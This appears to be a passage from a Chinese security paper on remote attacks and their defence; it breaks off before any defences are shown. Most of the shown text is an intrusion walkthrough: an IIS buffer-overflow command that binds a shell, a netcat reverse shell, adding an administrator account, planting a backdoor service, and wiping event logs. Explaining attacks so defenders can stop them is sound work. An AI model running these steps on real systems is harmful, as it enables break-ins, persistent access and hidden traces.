计算机网络远程攻击基本原理及其防范.docVIP

计算机网络远程攻击过程及防范措施 王 春 成 （大庆石化工程公司信息技术中心，黑龙江 大庆 163714） 摘要：为有效防范计算机网络黑客入侵和攻击，就必须熟悉网络被入侵和攻击的途径。 文中阐述了计算机网络遭受远程攻击的各种方式，以正向连接为例介绍了利用被攻击 主机漏洞进行攻击的原理及一般过程；并说明了计算机防范远程攻击的有效措施。 关键词：远程攻击； 正向链接； 防火墙； 检测系统 随着计算机网络的快速发展，网络安全问题日益突出。远程攻击是专门攻击除攻击者自己计算机以外的计算机（无论被攻击的计算机和攻击者位于同一子网还是有千里之遥）。远程计算机不是正在其上工作的平台，而是能利用某协议通过Internet网或任何其他网络介质被使用的计算机。攻击是指任何的非授权行为。这种行为的目的在于干扰、破坏、摧毁。 图1 远程攻击过程 首先查找在线的主机，然后利用漏洞扫描工具对目标主机进行扫描，查找目标主机系统存在的漏洞，利用查找到的漏洞选择1种攻击方式。攻击方式一般有2种：正向连接和反向链接。正向连接时利用对方的漏洞在对方主机上打开1个端口，从这个端口攻击，不用验证。反向链接：利用对方的漏洞在自己主机上打开1个端口，让对方链接自己。如用正向扫描软件扫描1台win2k没打补丁的机器，发现它存在web实路径入侵的漏洞，这个漏洞允许远程攻击者获得实路径。它实际上是1个缓冲区溢出漏洞，编写应用程序的人员没有指定程序在内存空间哪个地方运行，也没指定内存空间大小，现在用1个指定的程序替换它执行指定的任务就行了。 1.2 远程攻击的步骤 1.2.1 正向连接 （1）Idqover 0 172.16.0.110 80 1 5678 cmd.exe：其中，“0”代表win2ksp0, “172.16.0.110”为目标主机IP地址，“80”是端口号，“5678”是要打开的端口号，“cmd.exe”是溢出后执行的程序。 （2）远程登录目标主机。telnet 172.16.0.110 5678 （3）创建1个用户帐户，为下次攻击做准备。 ① net user username password add； ② 提升用户权限Net localgroup administrators username/add； ③ 安装后门程序。后门一般都是木马程序，木马程序一般利用TCP/IP协议，采用C/S结构，分为客户端和服务器端两个部分。服务器端程序运行在被攻击的计算机上，而客户端程序运行在攻击者的计算机上。客户端程序可以同时向很多服务端程序发送命令以控制这些计算机。在此处由于已经可以登录目标主机所以可以使用更简单的方式： Unc路径：\\172.16.0.110\c$，然后拷贝过去，也可使用命令更隐蔽一些。 Net use \\172.16.0.110\ipc$ password /u:username Copy rcmdsvc.exe \\172.16.0.110\admin$\system32 其中admin$是系统安装路径，rcmdsvc.exe是远程命令服务。接下来是让rcmdsvc.exe远程运行。这个可以通过计划任务来实现，前提是task scheduler启动。 at time c:\winnt\system32\ rcmdsvc.exe接下来要启动远程服务，可以通过工具实现。 Netsvc rcmdsvc \\172.16.0.110 /start 在入侵者的主机上运行rcmd，输入主机172.16.0.110 rcmd172.16.0.110 执行完以上命令即可登录目标主机，而且缺省有管理权限，入侵者就可以做自己想做的事了。 为了使入侵者更隐蔽，不轻易暴露，需要进一步的伪装。例如，可以伪装成不常用的服务。 接下来是清除脚印。事件查看器-应用程序日志、安全日志、系统日志，这些地方需要清理。日志文件在%systemroot%\system32\config\*.evt下。注册表文件里的痕迹在“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog”下。分别有Application、Security、System。选里面的file,编辑位置即可。查看日志可用工具实现。 1.2.2 反向连接 第2种攻击的方式是反向链接。入侵者现在自己主机上打开1个端口，然后让对方链接自己。可以借助nc.exe实现。 Nc-l-p 6666；Idqover 0 172.16.0.110 80 2 172.16.0.50 6666 cmd.exe 其中，172.16.0.50是入侵者自己。接下来同样是添加用户、提升权限、安装后门、清除脚印就行了。 远程攻击也可采用字典攻击的方式。它是